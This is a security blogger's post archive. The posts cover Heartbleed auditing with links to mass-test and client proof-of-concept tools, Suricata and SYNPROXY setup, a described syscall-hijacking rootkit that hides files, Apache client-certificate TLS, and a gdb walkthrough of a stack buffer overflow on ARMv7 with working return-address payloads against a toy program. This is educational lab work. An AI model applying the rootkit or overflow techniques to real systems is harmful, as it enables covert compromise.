Wednesday, April 16, 2014

Audit: don't only focus on heartbleed issue

I received the info about heartbleed issue on Apr 8 andI found out SLES-11 are using OpenSSL 0.9.8 branch code, which is not vulnerable to heartbleed issue. Then I patched it for OpenSuSE 13.1/12.3. It was easy because the patch was already there.

After an exciting and crazy week. People are getting calm and plan or already start to doing audit on their system. But there are something you might miss. The older version of OpenSSL( like 0.9.8) might not affected by heartbleed issue but it doesn't mean you are secure. Don't forget the old OpenSSL are still vulnerable to BEAST( 2011), CRIME( 2012), Lucky-thirteen( 2013). I do believe Lucky-thirteen is far more dangerous than heartbleed, we just don't know. Once you start the audit, plz upgrade the OpenSSL to the latest version. If you are using 0.9.8, plz upgrade to 0.9.8y, which is not vulnerable to Lucky-13 issue.

Fix heartbleed issue for website is much easier than the networking devices( Firewall, UTM, SSL/IPSEC VPN, etc) and the 3rd-party software. This definitely gonna impacting for long term.

I'd like to share some materials( you might already known).

Heartbleed issue technical analysis:
https://www.getpantheon.com/heartbleed-fix
http://blog.ioactive.com/2014/04/bleeding-hearts.html
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html
http://blog.ioactive.com/2014/04/bleeding-hearts.html


I totally agree with the last point from this article:
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html

To these major companies are highly reply on the open source TLS implementation( OpenSSL, GnuTLS, etc) should give them funding, to make them more secure and stable.

EFF is always right about how to aginst massive surveillance by agencies
like NSA. PFS is so fuc*ing important especially today. I think we should use TLS 1.2.

https://www.eff.org/deeplinks/2014/04/wild-heart-were-intelligence-agencies-using-heartbleed-november-2013
https://www.eff.org/deeplinks/2014/04/why-web-needs-perfect-forward-secrecy
https://www.eff.org/deeplinks/2013/08/pushing-perfect-forward-secrecy-important-web-privacy-protection
https://www.eff.org/deeplinks/2011/11/long-term-privacy-forward-secrecy

Performance hit probably is one of reasons that PFS is so important but the fact is only afew websites using it:
http://nmav.gnutls.org/2011/12/price-to-pay-for-perfect-forward.html

Test top-1m websites:
https://github.com/musalbas/heartbleed-masstest

C:
https://github.com/robertdavidgraham/heartleech

Client PoC:
https://github.com/Lekensteyn/pacemaker

---------------------------------------------------------
One more thing, to those who are still complaining about the security of free/open source software is worse than closed software. Well, I don't want to argue here. But, I'm giving you type of people 3 options:
1, Join the community, help the FOSS community to do code audit.
2, Make some donations to the organizations who really cares about your privacy and do the code audit for us. Like EFF, I'm fuc*ing pround of I'm member of EFF.....
3, G O   H O M E   A N D   F U C K   Y O U R S E L F   ! ! !

Monday, March 31, 2014

Suricata's file extraction on Debian GNU/Linux

Suricata is a high performance open source IDS/IPS project. I used it a long time ago around 2010 when it was released. I've been playing with Snort recently and then found Suricata has a great feature: File extraction. It'd be helpful to those who want to get malware samples from IDS. Anyway, like old days, I want to test it on my own and see how it works on Debian. First things first, I need to build it and see if it works.

Download a latest version of the small installation ISO image. I need to clarify my testing environment: Debian is running on my virtual machine, which has two NICs are eth0 and eth1. Interface eth0 is running on NAT mode and eth1 is running bridge mode.  Debian don't assign any IP addr to eth1.

Because our Debian is the small installation. So we have to install some dependency packages via simply apt-get:

#apt-get install vim openssh-server ethtool libpcap-dev libnfnetlink-dev libnetfilter-queue-dev libdnet-dev libdumbnet-dev libpcre3-dev libpcre3-dbg bison flex make zlib1g-dev autoconf libtool libnss3-dev libnspr4-dev libjansson4 libjansson-dev libyaml-dev libcap-ng0 libcap-ng-dev libnet1-dev libmagic-dev build-essential

Get the source code of Suricata:
#cd /tmp
#wget wget http://www.openinfosecfoundation.org/download/suricata-2.0.tar.gz
#tar zxvf suricata-2.0.tar.gz
#cd suricata-2.0

Compile and installation:
#./configure --enable-nfqueue --enable-gccprotect --prefix=/usr/local/suricata --localstatedir=/var
#make -j3
#make make-full

Edit suricata.yaml:
1, Set the request/response body a litte bigger:
           request-body-limit: 1gb #3072
           response-body-limit: 1gb #3072

2, Enable file extraction:
  - file-store:
      enabled: yes       # set to yes to enable
      log-dir: files    # directory to store the files
      force-magic: no   # force logging magic on all stored files
      force-md5: no     # force logging of md5 checksums
      waldo: file.waldo # waldo file to store the file_id across runs

  # output module to log files tracked in a easily parsable json format
  - file-log:
      enabled: yes
      filename: files-json.log
      append: yes
      #filetype: regular # 'regular', 'unix_stream' or 'unix_dgram'

3, Add our "test" rule file( test.rules in this case) into the section "default-rule-path:", like:
default-rule-path: /usr/local/suricata/etc/suricata/rules
rule-files:
 - test.rules
 - botcc.rules

Create a rule file:
/usr/local/suricata/etc/suricata/rules/test.rules

Add one line into test.rules( to save any jpg files) :
alert http any any -> any any (msg:"FILESTORE jpg"; fileext:"jpg"; filestore; sid:6; rev:1;)

Enable the eth1:
#ifconfig eth1 up

According to the Suricata's wiki, we should turn off the TCP GSO:
ethtool -K eth1 tso off
ethtool -K eth1 gro off
ethtool -K eth1 lro off
ethtool -K eth1 gso off
ethtool -K eth1 rx off
ethtool -K eth1 tx off
ethtool -K eth1 sg off
ethtool -K eth1 rxvlan off
ethtool -K eth1 txvlan off
ethtool -N eth1 rx-flow-hash udp4 sdfn
ethtool -N eth1 rx-flow-hash udp6 sdfn
ethtool -n eth1 rx-flow-hash udp6
ethtool -n eth1 rx-flow-hash udp4
ethtool -C eth1 rx-usecs 1000
ethtool -C eth1 adaptive-rx off

Run the Suricata with this command:
/usr/local/suricata/bin/suricata -c /usr/local/suricata/etc/suricata//suricata.yaml -i eth1

Use your firefox/chrome on your host machine, and visit some website, like this.

You should see some girl pictures in /var/log/suricata/files  ;-)

btw: Thanks to Suricata community brings us this fuc*ing awesome IDS/IPS project. Special thanks to Peter Manev.

Wednesday, March 19, 2014

SYNPROXY: the great DoS mitigation solution

I don't expect to can see a perfect DoS solution in my lifetime;-) As we known, there are tons of commercial gateway-level boxes can mitigate the DoS attack in some ways. But I prefer the combination of x86+GNU/Linux, like the most old school guys. Why? My answer is simple: It's the fuc*ing cheapest solution we have. SYNPROXY is one of  new features of linux kernel 3.13. It's based on netfilter framework and connection tracking. If I understand correctly, SYPROXY should mark the initial SYN packet as UNTRACKED and redirecting them into iptables's action "SYNPROXY"( like ACCEPT, DROP, NF_QUEUE, etc). SYNPROXY would be acting like a network gateway device( router?) to performing the regular TCP x-way handshakes. The original packet will be passing into the dst when handshake process is finished. The contributor Jesper Dangaard Brouer gave us a free speech at DEVCON last month. According to his slide's test result, these numbers are really looking good. I did a little test with my colleague today.

Platform: Debian, SLES-12-beta2
Hardware: Laptop, Server, 100Mbps Switch
Tools: hping3, metasploit

root@d6-test:/home/shawn# iptables -t raw -A PREROUTING -i eth0 -p tcp --dport 8888 --syn -j NOTRACK
root@d6-test:/home/shawn# iptables -A INPUT -i eth0 -p tcp --dport 8888 -m state --state UNTRACKED,INVALID -j SYNPROXY --sack-perm --timestamp --mss 1480 --wscale 7 --ecn
echo 0 > /proc/sys/net/netfilter/nf_conntrack_tcp_loose

Result:
Without SYNPROXY: ksoftirq is around 8%-9%
With SYNPROXY: ksoftirq is less than 3%

btw: This result may not be very accurate. Anyway, SYNPROXY works.

Thursday, February 06, 2014

Simple linux rootkit on Debian with kernel 3.13

I've wasted a lot of time in 2013. I've always find some shity execuses, like "I'm fucking busy recently" to delay my hacking journey of kernel rootkit. This was supposed to be done a couple of months ago. Thank L0rd! I found a slot during Chinese new year vacation at my hometown. I begun the adventure of rootkit hacking. I've read a bunch of great Phrack papers from the old good hacking days. It's old but it'd help.

---------------------------------------------------------------
[Weakening the Linux Kernel, Phrack Magazine Volume 8, Issue 52
January 26, 1998, article 18 of 20]
http://www.phrack.org/issues.html?issue=52&id=18&mode=txt

[Advances in Kernel Hacking, Volume 0x0b, Issue 58, Phile #0x06 of
0x0e]
http://www.phrack.org/issues.html?issue=58&id=6&mode=txt

[Handling Interrupt Descriptor Table for fun and profit, Volume 0x0b,
Issue 59, Phile #0x04 of 0x12]
http://www.phrack.org/issues.html?issue=59&id=4&mode=txt

[Kernel Rootkit Experiences, Volume 0x0b, Issue 61, Phile 0x0e of
0x0f]
http://www.phrack.org/issues.html?issue=61&id=14&mode=txt

[Mistifying the debugger, Volume 0x0c, Issue 65, Phile #0x08 of
0x0f]
http://www.phrack.org/issues.html?issue=65&id=8&mode=txt

Especially thanks to THC's paper, which was released in 1999:
[Complete Linux Loadable Kernel Modules]
https://www.thc.org/papers/LKM_HACKING.html
---------------------------------------------------------------

I wrote a simple rootkit that can only hide a specific file. Just a
few old school steps could make its feature possible:

Firstly, we need to retrieve the system call table. But it's no longer
exported since 2.6. Fortunately, there's still a few system calls are
exported. sys_close() is one of them:
--------------------------------------
root@d6-test:/home/shawn# grep sys_close /boot/System.map-3.13.0
c10e0aa1 T sys_close
c140fdc4 R __ksymtab_sys_close
c141815c r __kcrctab_sys_close
c1420e33 r __kstrtab_sys_close
--------------------------------------

I used a brute force way to locate that system call. I learned it from
memset's blog:
https://memset.wordpress.com/2011/03/18/syscall-hijacking-dynamically-obtain-syscall-table-address-kernel-2-6-x-2/

Start mem addr would be 0xc0000000, then it would try it repeatly unti
it locate sys_close()'s addr.

Then, write protection bit in cr0 has to be shut down. WP bit is the
16th bit in cr0 register.

31  30  29  28          19  18  17  16  15         6  5  4  3  2  1  0
+----------------------------------------------------------------------+
|PG|CD |NW|-----------------|AM|---|WP|--------------|NE|ET|TS|EM|MP|PE|
+----------------------------------------------------------------------+

After we done above steps, we are able to hijack the system call we
want. Here I choose to hijack getdents64(). Why? Because all I wanna
do is hide a specific file from "ls". Let's see what "ls" would
usually do:
------------------------------------------
// begin.........
execve("/bin/ls", ["ls"], [/* 16 vars */]) = 0
brk(0)                                  = 0x8366000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7791000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=19346, ...}) = 0
.......................
.......................
.......................
// look, that's it
getdents64(3, /* 17 entries */, 32768)  = 544
getdents64(3, /* 0 entries */, 32768)   = 0
close(3)                                = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7790000
.......................
// then it would display them in the standard out(1)
write(1, "a.out  dirent.c  dirent.c~  insi"..., 107a.out  dirent.c  dirent.c~  insight-lab  libmnl  libnftables  linux-3.13  linux-3.13.tar  my_tmp  nftables
) = 107
.......................
------------------------------------------

The only struct from kernel we have to face is:
-------------------------------------------------------------------
           struct linux_dirent {
               unsigned long  d_ino;     /* Inode number */
               unsigned long  d_off;     /* Offset to next linux_dirent */
               unsigned short d_reclen;  /* Length of this linux_dirent */
               char           d_name[];  /* Filename (null-terminated) */
                                   /* length is actually (d_reclen - 2 -
                                      offsetof(struct linux_dirent, d_name) */
               /*
               char           pad;       // Zero padding byte
               char           d_type;    // File type (only since Linux 2.6.4;
                                         // offset is (d_reclen - 1))
               */

           }
-------------------------------------------------------------------

d_reclen is size of the current linux_dirent64, it does matters. Plz
read the fucking source code for any detail! Well, like in good old days, I drew an ascii big picture here.

May the L0rd's hacking spirit guide us!!!

Wednesday, December 25, 2013

Life was never easy...especially in post-prism era;-)

I've watched a great free speech today:

Bruce Schneier, our great philosopher in cybersec field. And Eben Moglen, afaik, he is a great hacker( not in computer stuff) in free software law field. I do remember I used to listen Eben's free speech( electronic version) when I was in college. Seven years until now, I know better about why there are group of people has been trying fight for digital rights, software freedom, etc.....

I'm here to share something I've learn from Bruce and Eben today. This writeup is going to be my notes and some personal summary of 2013. It may be mess a little bit;-)

What do we learn from Mr Snowden's disclosure about crypto?
------------------------------------------------------------------
Cryptography itself is still hard to break. NSA is not breaking the math, but breaking by cheating, by stealing private keys, by forging certificates, by doing non-crypto stuff to archive their *ditry* goals. Even in the fucked-up case of Google, NSA didn't crack the traffic between user's browser and Google's server. Because Google uses client auth SSL at default, more importantly, it works( NSA dont like it). But NSA hijacked the traffic between Google data centers where the SSL/TLS was removed for whatever reasons( cost?). Crypto is still the one of the best ways to fight NSA or NSA-like organization.


Tor stories?
------------------------------------------------------------------
Personally, I like Tor. It probably could save people's life in some "restricted" area. Tor is pissed off agencies like NSA. The contributors of Tor project have routine seminars. It seems that the discussion of how to break Tor is their daily bread;-) Thanks to Tor project contributors.

What if NSA is in our threat model?
------------------------------------------------------------------
The 1st thing is mitigation: NSA got a piece of math but still need a bunch of engineers to make it work. Let NSA pay for higher cost( timing budget not new math). Plz use particular crypto technology( on GNU/Linux distro) as much as possible. It's reasonable to speculating that NSA has something about crypto stuff but we don't. Information asymmetry is indeed exsit. Of course NSA known what we do in past decades but we are rarely to known what NSA has been doing in the same period..so thanks to Mr Snowden's disclosure gave us *a little more* information.

And NSA-like organizations are definitely needs a lot of automated attack tools: foxasset? The reason it simple: you can't just train people on the street to become old school hackers in few months. That's why they have to develop automated tools.

btw: What does old school hacker mean in my context? A type of people who are highly skilled with low-level techniques, such as *NIX System, networking( both internet stuff and corenet of telco), reversing, cryptography, C/ASM code audit, etc..and also have a specific type of strong philosophy with underground spirit;-)....ug spirit~wth

Standard corruption?
------------------------------------------------------------------
It's not all standards does security matters. Bruce thinks AES is still secure. We can't only blame the Dual ECC stuff to standard process's fault. Implementation is important, such as non-NSA involved internation cellphone standard was fucked up..A1/5? Ring the bell? We should only trust these public standards, which our guys( free software enthusiast, cybersec philosophical anarchist like Phrack guys? or people like Bruce?:)) are getting involve with it.

What tools can we trust?
------------------------------------------------------------------
GNUPG, tor, OTR, etc... Some of these open source tools are written by security/crypto paranoids. They have a very awesome design and implementation.

What if you are on the target list of NSA-like organization?
------------------------------------------------------------------
If you are targeted, there's nothing you can do in that level. Is this a super-APT shit?

Is cyberwar going to be end?
------------------------------------------------------------------
I don't think so. If everyone holds the philosophy of "I'll fuck you if you don't fuck me first, sir", then it would turn the whole scene to be everybody being fucked by everybody. That's what old school hackers has been through the paradigm shift( painfully?) from old good hacking days to "This is cyber, sir!".

Is that sounds we are hopeless?
------------------------------------------------------------------
Nope, quoted from Bruce:"Society improves because people dare to think the unthinkable and then after 20, 30 years everyone says that was kind of good idea. It takes a while but it has to start."


FOSS solutions?
------------------------------------------------------------------
Bruce thinks open source solution is more secure than closed ones. Because:
1, You can look at it( source code)
2, It's harder to let someone slip into

We probably don't need to worry too much( did I say "too much"?) about NSA was/is/will try to put backdoor in some fundamental free software projects, like linux kernel, GCC, Glibc, "supposed to be re-written" openssl;-) etc. Because according to the full-disclosured documentations, NSA seems amazingly risks aversed. They only want to take a safe path. Yeah..yeah, I know what they're thinking...you can do evil, but don't be caught up;-) Free/open source community have a lot of old school hackers has been do code review for decades. They did a great job. And they are going to continue this *secret* war aginst NSA-like organization. So it's not easy attack( backdooring) on compiler.....( and, there are tons of guys like me are trying to be old school hackers).

Leap of faith?
------------------------------------------------------------------
Yeah, it sounds perfect. But no one can ensure you 100% secure. But the fact is that you can't examine everything. You must trust them( the tools you use). Give yourself a little faith. Did Soren A. Kierkegarrd said that we could feel comfortable to use GCC;-)

Well, use Apple products( iphone, ipad, ishit) and Microsoft products( Win for gaming platform, Office for whatever) are not a good options. Drop them, come on!

Hardware box issues: never update the full-disclosured vulns:
------------------------------------------------------------------
In some countries, cybersec business couldn't support small business. The reason cause that happened, because the most of customers had/have the wrong concept about cybersec. They think the only thing you need to do is
buy a bunch of hardware boxes( firewall, IDS/IPS, UTM, NGFW, or whatever). Obviously, it's violating the very important old school principles:
------------------------------------------------------------------
Security is NOT:

Security is NOT installing a firewall ..
Security is NOT a Product or Service .. ( by Schneier, Bruce )
Security is Not a Product; It's a Process .. ( by Schneier, Bruce )
A Security Audit is NOT "running a port scan and turning things off" ..


Security is:

Security is "Can you still continue to work productively/safely, without compounding the security breach"
Security is only as good as your "weakest link"
Security is "risk management" of your corporate resources(computers/people), required expertise, time management, implementation costs, data backup/recovery proceedures ...
Security is a Process, Methodology, Costs, Policies and People
Security is "Can somebody physically walk out with your computers,
disks, tapes, .. "
Security is 24x7x365 ... constantly ongoing .. never ending
Security is "learn all you can as fast as you can, without negatively
affecting the network, productivity and budget"
------------------------------------------------------------------

In past few years, more and more enterprise management guys are realizing that those hardware boxes can't solve the problem, which it was supposed to be solved.* Right here, there's one thing you might want to know: Firstly, some "sec box" vendor has been using a lot of open source code( linux kernel, snort, l7, BRO, etc) but they never contribute to the community. *........Personally I do believe that only old school cybersec principles can make system secure. But it need skilled people to do a lot of work in the daily cybersec process.  Well,  the mainstream marketing are still advertising the *boxes* solution is one thing, while it's hard to find old school guys is another.

What I'm trying to say are not hardware boxes are not important. But people also can do small business with trying to find cheap and effective solution. That's where open source cybersec solution fit in. There are a lot of great cybersec open source project. All you have to do is to pay someone who know
these cybersec open source code and combine them into the your own cybersec solution. For example, a customer want to hardening their network and server. There are a lot of open source sec project can do that, such as
iptables/snort/psad/tcpwrapper/apparmor/openssl/apache or web level
hardening stuff( inside the DJANGO for preventing sql injection, mod_security, etc). But the customer would pay someone who know about it to consulting for
them. The skilled guy could train customer's IT guys or go through
with their own implementation. Personally, I think it's the best to do
the cybersec small business. It's win-win solution! Old school guys get
pay and customer are happy.

btw: Some regions may have these cybersec small business model already.
--------------------------------------------------------------------------

Well, it's Christmas today. As a Neo-Calvinist, I wouldn't talk about religion too much  in my daily life. But all in all, neo-calvinist is Christian indeed. I'm not too religious. Sometimes, I really hate those nominal christian was feel so good to doing terrible things  in name of god....fuc* them....Anyway, hacker is a type of people who are willing to seek the truth with no matter cost. Even I'd see L0rd Jesus look like overmind( from starcraft) after I die. The problem to me would be "Is this true my L0rd looks like overmind?", if he is the L0rd whatever he looks like, I'd be still worship him;-)

Hacker can pick the red pill.
Hacker can destroy the blue pill.
Hacker can embrace the desert of the real.

Merry Christmas, my fellow brothers/sisters!

May L0rd's hacking spirit guide us in 2014!!!

Wednesday, November 27, 2013

How to set up apache2 with SSL/TLS support and client auth on Debian 7.2

I think SSL/TLS should be part of security hardening process. Only fools would not use cryptography technology in post-prism era. I think what Mr Snowden did, that was proved one thing: Richard Stallman and Phrack guys( I prefer use the term "philosophical anarchist") never lie to us;-) Well, I don't wanna bullshit anything about this controversial topic here...let's see how we can set up a HTTPS server with client auth.

Generate CA certificates:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp /usr/lib/ssl/misc/CA.sh .
root@d6-test:/opt/ssl# ./CA.sh -newca
CA certificate filename (or enter to create)

Making CA certificate ...
Generating a 2048 bit RSA private key
..................................+++
..............................................+++
writing new private key to './demoCA/private/./cakey.pem'
.............................................
.............................................
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/./cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number:
            c0:81:0e:bc:52:d0:19:5a
        Validity
            Not Before: Nov 19 02:08:14 2013 GMT
            Not After : Nov 18 02:08:14 2016 GMT
        Subject:
            countryName               = CN
            stateOrProvinceName       = Shanghai
            organizationName          = MOT
            organizationalUnitName    = MOT
            commonName                = hardened-shit
            emailAddress              = info@hardened-shit.com
        X509v3 extensions:
            X509v3 Subject Key Identifier:
                D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
            X509v3 Authority Key Identifier:
                keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63

            X509v3 Basic Constraints:
                CA:TRUE
Certificate is to be certified until Nov 18 02:08:14 2016 GMT (1095 days)

Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------

Copy intermediate key and certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp demoCA/private/cakey.pem ca.key
root@d6-test:/opt/ssl#
root@d6-test:/opt/ssl# cp demoCA/cacert.pem ca.crt
--------------------------------------------------------------------------------

Generate server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out server.key 2048
Generating RSA private key, 2048 bit long modulus
...+++
.................+++
e is 65537 (0x10001)
Enter pass phrase for server.key:
Verifying - Enter pass phrase for server.key:
--------------------------------------------------------------------------------

Generate server CSR(Certificate Signing Request) with server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key server.key -out server.csr
...........................................
........................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
--------------------------------------------------------------------------------

Genrate server certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -x509 -days 2048 -key server.key -in server.csr > server.crt
Enter pass phrase for server.key
--------------------------------------------------------------------------------

You can check out the cert or verify it:
openssl x509 -noout -text -in server.crt
openssl verify -CAfile ca.crt server.crt


Generate client's key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out client.key 2048
Generating RSA private key, 2048 bit long modulus
..........................................................................................................................................+++
........+++
e is 65537 (0x10001)
Enter pass phrase for client.key:
Verifying - Enter pass phrase for client.key:
--------------------------------------------------------------------------------

Client's CSR:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key client.key -out client.csr
.......................................................
..............................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-info.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Generate client's certificate with CA certificate's signature:
root@d6-test:/opt/ssl# openssl ca -in client.csr -out client.crt
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number:
            c0:81:0e:bc:52:d0:19:5c
        Validity
            Not Before: Nov 19 02:28:13 2013 GMT
            Not After : Nov 19 02:28:13 2014 GMT
        Subject:
            countryName               = CN
            stateOrProvinceName       = Shanghai
            organizationName          = MOT
            organizationalUnitName    = MOT
            commonName                = hardened-shit
            emailAddress              = info@hardened-info.com
        X509v3 extensions:
            X509v3 Basic Constraints:
                CA:FALSE
            Netscape Comment:
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier:
                A6:A5:D7:7C:C7:A8:C3:24:C7:90:14:76:84:15:43:D0:2C:0C:31:66
            X509v3 Authority Key Identifier:
                keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63

Certificate is to be certified until Nov 19 02:28:13 2014 GMT (365 days)
Sign the certificate? [y/n]:y


1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------


Convert to pkcs12 format, which can be identified by firefox:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.pfx
Enter pass phrase for client.key:
Enter Export Password:
Verifying - Enter Export Password:
--------------------------------------------------------------------------------

Enable SSL/TLS support in Apache2:
--------------------------------------------------------------------------------
root@hardened-shit:/opt# mv ssl /etc/ssl/hardened-shit

root@hardened-shit:/etc/apache2# a2ensite default-ssl
Enabling site default-ssl.
To activate the new configuration, you need to run:
  service apache2 reload
root@hardened-shit:/etc/apache2# a2enmod ssl
Module ssl already enabled

edit /etc/apache2/sites-enabled/default-ssl:
        SSLCertificateFile    /etc/ssl/hardened-shit/server.crt
        SSLCertificateKeyFile /etc/ssl/hardened-shit/server.key

        SSLCertificateChainFile /etc/ssl/hardened-shit/ca.crt

        SSLCACertificatePath /etc/ssl/hardened-shit/
        SSLCACertificateFile /etc/ssl/hardened-shit/ca.crt

        SSLVerifyClient require
        SSLVerifyDepth  10










Disable port 80:
root@hardened-shit:/etc/apache2# a2dissite default
--------------------------------------------------------------------------------

Done....it should works.

btw: I highly recommend you to read these two articles if you want to know further: Hardening Your Web Server's SSL Ciphers, and TLS Perfect Forward Secrecy support with Apache

I only enable the secure ciphers:
SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5
SSLProtocol +TLSv1.2 +TLSv1.1

Thursday, November 21, 2013

Hello, stack bufferoverflow on Debian ARMv7

I haven't make my hands *dirty* for a long time since I stopped on io-wargame lvl11. As we all know that ARM architectures are becoming sec guys's daily bread. I think it's time to begin my journey to explore what's the diff between ARMv7 and x86/x64 out there. It would be good to build a testing environment in the pre-adventure stage. Debian has been supporting ARMv7 for a while. You can follow this great article to install a Debian GNU/Linux for ARMv7( armhf) distro. After the installation, you probably want to config a NAT network between host and qemu guest. Or just use my network config.

To figure out the memory layout is a good starting point. Take a glance at the code at 1st, plz.....

shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q
Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.
(gdb) disassemble main
Dump of assembler code for function main:
   0x00008448 <+0>:    push    {r7, lr}
   0x0000844a <+2>:    sub    sp, #8
   0x0000844c <+4>:    add    r7, sp, #0
   0x0000844e <+6>:    str    r0, [r7, #4]
   0x00008450 <+8>:    str    r1, [r7, #0]
   0x00008452 <+10>:    movw    r3, #34040    ; 0x84f8
   0x00008456 <+14>:    movt    r3, #0
   0x0000845a <+18>:    mov    r0, r3
   0x0000845c <+20>:    movw    r1, #33797    ; 0x8405
   0x00008460 <+24>:    movt    r1, #0
   0x00008464 <+28>:    movw    r2, #33845    ; 0x8435
   0x00008468 <+32>:    movt    r2, #0
   0x0000846c <+36>:    blx    0x8340
   0x00008470 <+40>:    ldr    r3, [r7, #0]
   0x00008472 <+42>:    add.w    r3, r3, #4
   0x00008476 <+46>:    ldr    r3, [r3, #0]
   0x00008478 <+48>:    mov    r0, r3
   0x0000847a <+50>:    bl    0x8404
   0x0000847e <+54>:    mov.w    r3, #0    ==> 0x0000847e should be the return address of test()
   0x00008482 <+58>:    mov    r0, r3
   0x00008484 <+60>:    add.w    r7, r7, #8
   0x00008488 <+64>:    mov    sp, r7
   0x0000848a <+66>:    pop    {r7, pc}
End of assembler dump.
(gdb) disassemble fuck_me
Dump of assembler code for function fuck_me:
   0x00008434 <+0>:    push    {r7, lr} ===> Use 0x00008434 to overwrite test()'s ret addr
   0x00008436 <+2>:    add    r7, sp, #0
   0x00008438 <+4>:    movw    r0, #34024    ; 0x84e8
   0x0000843c <+8>:    movt    r0, #0
   0x00008440 <+12>:    blx    0x8358
   0x00008444 <+16>:    pop    {r7, pc}
End of assembler dump.

Let's check the memory layout:

(gdb) b test
Breakpoint 1 at 0x840c: file victim.c, line 11.
(gdb) r AAAABBBB
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB
The address of func test(): 0x8405, func fuck_me(): 0x8435

Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11
11      strcpy(buf, input);
(gdb) n
12      printf("%s \n", buf);
(gdb)
AAAABBBB
13    }
(gdb) x/12x $sp
0x7efff658:    0x00000000    0x7efff919    0x000084f8    0x41414141
0x7efff668:    0x42424242    0x00008400    0x7efff678    0x0000847f==> ret addr of test()
0x7efff678:    0x7efff7d4    0x00000002    0x00000000    0x76f12cfb

So the layout should be like this:
[high addr]...[buf:..16-byte...][Return addr]...[low addr]

Why the hell the addr of 0x0000847e we saw above now became 0x0000847f. Weird...Anyone know about what happened?

OK, let's try our 1st exp:
(gdb) r `python -c 'print "A" * 16 + "\x34\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A' , "4\204") at victim.c:11
11      strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA4�

Program received signal SIGILL, Illegal instruction.
fuck_me () at victim.c:17
17      printf("being hacked\n");
(gdb) n

Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.

Did you see this? +1 with the fuc_me()'s addr, plz.....

(gdb) r `python -c 'print "A" * 16 + "\x35\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435

Breakpoint 1, test (input=0x7efff90f 'A' , "5\204") at victim.c:11
11      strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA5�
being hacked

Program received signal SIGSEGV, Segmentation fault.
0x00008432 in test (input=) at victim.c:13
13    }

It worked! So, the exp should be like:
